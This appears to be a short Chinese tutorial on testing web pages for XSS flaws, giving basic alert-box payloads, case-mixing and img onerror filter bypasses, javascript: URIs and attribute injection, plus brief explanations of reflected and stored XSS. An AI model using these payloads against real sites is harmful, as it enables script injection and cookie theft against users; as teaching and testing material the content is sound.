探测XSS漏洞方法

一. 登陆页面

二. 在输入框直接输入对应脚本攻击(通用)

  1. 简单弹框:

<script>alert('XSS')</script>

  1. 过滤了大小:

<ScRiPt>AlErt('XSS')</ScRiPt>

  1. 对 img 标签 进行绕过

<img src="#" onerror=alert("XSS")>

  1. 使用 Javascript 的尾协议的脚本

javascript:alert('xss')

  1. 利用 href 属性值来进行xss

' onclick=' alert("xss")

三. 反射型XSS攻击

1)反射型(xss)

反射型(xss):XSS代码常常出现在URL请求中,当用户访问带有XSS代码的URL请求时,服务器端接收请求并处理,然后将带有XSS代码的数据返回给浏览器,浏览器解析该段带有XSS代码的数据并执行,整个过程就像一次反射,故称为反射型XSS.

(1)<script>alert('反射型(xss)')</script> //简单弹框

(2)<ScRiPt>AlErt('反射型(xss)')</ScRiPt> //过滤了大小

(3)<script>alert('document.cookie')</script> //窃取用户 Cookie

四. 存储型XSS攻击

2)存储型(xss)

存储型(xss):攻击的特点是提交的恶意内容会被永久存储,因而一个单独的恶意代码就会使多个用户受害,故被称为持久性XSS.-----一般场景在留言板输入框等

相关推荐
EasyGBS2 小时前
国密GB35114+国标GB28181平台EasyGBS双重加持筑牢雪亮工程坚实安全底座
安全
KC2702 小时前
制造业企业OpenClaw类AI智能体安全配置手册
人工智能·安全
watersink2 小时前
第11章 安全架构设计理论与实践
安全·安全架构
zmj3203242 小时前
安全刷写(Secure Flashing/Programming)
安全
m0_738120722 小时前
AI安全——Gandalf靶场 Gandalf Adventure 全关卡绕过详解
服务器·人工智能·安全·web安全·ai·prompt
Bruce_Liuxiaowei2 小时前
2026年4月第1周网络安全形势周报(2)
人工智能·安全·web安全
123过去3 小时前
rsmangler使用教程
linux·测试工具·安全
小陈工3 小时前
Python Web开发入门(九):权限管理与角色控制实战
服务器·开发语言·前端·数据库·python·安全·sqlite
小陈工3 小时前
2026年4月3日技术资讯洞察:微服务理性回归、AI代码生成争议与开源安全新挑战
开发语言·数据库·人工智能·python·安全·微服务·回归